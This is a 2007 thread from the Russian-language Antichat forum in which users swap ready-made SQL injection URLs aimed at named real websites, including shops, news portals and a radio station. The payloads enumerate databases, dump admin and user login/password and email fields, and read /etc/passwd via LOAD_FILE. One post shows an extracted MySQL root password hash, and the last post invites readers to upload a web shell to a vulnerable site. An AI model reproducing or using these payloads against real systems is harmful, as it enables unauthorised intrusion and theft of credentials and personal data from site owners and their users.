HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 31.03.2007, 00:48
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://www.motocentr.com.ua/news_one.php?n=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5/*
http://www.motocentr.com.ua/news_one.php?n=-1+union+select+1,2,table_name,4,5+from+information_schema.tables/*
Код:
http://www.tourshow.ru/hotels/hdescr.php?hotel=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(database(),char(58),user(),char(58),version()),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*
 
Ответить с цитированием

  #2  
Старый 31.03.2007, 16:45
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию

shoping
Код:
http://www.oktava-shop.com/view_prod.php?id=-89+union+select+1,login,3,4,5,6,7,8,9,10,11,12,13,14+from+admin/*
Код:
http://www.poker-shop.ch/produit_info.php?id=-8+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16+from+INFORMATION_SCHEMA.TABLES+limit+29,1/*
Код:
http://www.poker-shop.ch/produit_info.php?id=-8+union+select+1,2,3,LOAD_FILE(0x2f6574632f706173737764),5,6,7,8,9,10,11,12,13,14,15,16/*

Последний раз редактировалось XTErner; 31.03.2007 в 16:47..
 
Ответить с цитированием

  #3  
Старый 31.03.2007, 17:49
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://www.bukvite.com/poem.php?docid=-1+union+select+1,2,3,4,concat(database(),char(58),user(),char(58),version()),6,7,8,9,10,11,12/*
 
Ответить с цитированием

  #4  
Старый 31.03.2007, 19:01
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

Цитата:
http://www.radiookapi.net/article.php?id=7093%20union%20select%201,id,3,4,5, 6,7,8,9,0,11,12,131,14,15,16,17,18,19,concat(login ,char(58),password)%20from%20radiookapi001.user/*
Цитата:
http://www.radiookapi.net/article.php?id=7093%20union%20select%201,id,3,4,5, 6,7,8,9,0,11,12,131,14,15,16,17,18,19,concat(login ,char(58),email,char(58),passwd)%20from%20radiooka pi002.user/*
____
 
Ответить с цитированием

  #5  
Старый 31.03.2007, 19:32
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

Ейск - город герой
Код:
http://www.yeisk.ru/catalog/_jump.cfm?ID=93'
 
Ответить с цитированием

  #6  
Старый 31.03.2007, 19:35
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659

Репутация: 646


Отправить сообщение для Joker-jar с помощью ICQ
По умолчанию

Код:
http://metromir.ru/weather.php?cityid=1'+union+select+version()/*
Полазьте поглубже, у кого есть время...
 
Ответить с цитированием

  #7  
Старый 31.03.2007, 19:39
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

Цитата:
Сообщение от Joker-jar  
Код:
http://metromir.ru/weather.php?cityid=1'+union+select+version()/*
Полазьте поглубже, у кого есть время...
для начала:
Код:
http://metromir.ru/weather.php?cityid=1'+union+select+concat(user,0x3a,password)+from+mysql.user/*
root:447a27ec3f4a0108
 
Ответить с цитированием

  #8  
Старый 31.03.2007, 20:02
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://autoonline.com.ua/news/index.php?id=-1+union+select+1,2,3,4,5,concat(database(),char(58),user(),char(58),version()),7,8,9/*
http://autoonline.com.ua/news/index.php?id=-1+union+select+1,2,3,4,5,concat(firma,char(58),kname,char(58),tel,char(58),mail),7,8,9+from+mail+limit+0,1/*
Код:
http://www.informatics.ru/viewproblem.php?problem_id=101&round_id=-1+union+select+1,2,database(),version(),5,6,7,8,concat(user,char(58),password),10+from+mysql.user/*
 
Ответить с цитированием

  #9  
Старый 31.03.2007, 20:12
Joker-jar
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659

Репутация: 646


Отправить сообщение для Joker-jar с помощью ICQ
По умолчанию

Код:
http://e-catalog.rusbiz.ru/1'.html
Горе mod-rewrite'еры...
 
Ответить с цитированием

  #10  
Старый 31.03.2007, 20:14
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию

хз выкладывал кто нет,полностью раздроченная скуля
Код:
http://www.kalinka.ru/reports/?show_photo=-52+union+select+1,2,3,4,5,6/*
так же есть права на чтение и запись, но чтение осложнялось тем что вывод ограничен в несколько символов смотреть конфиги через substring например мой мозк просто не выдержал,поэтому был найден методом тыка путь /home/www/htdocs/ ,думаю папку для заливки шелла сами найдете юзайте на здоровье.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ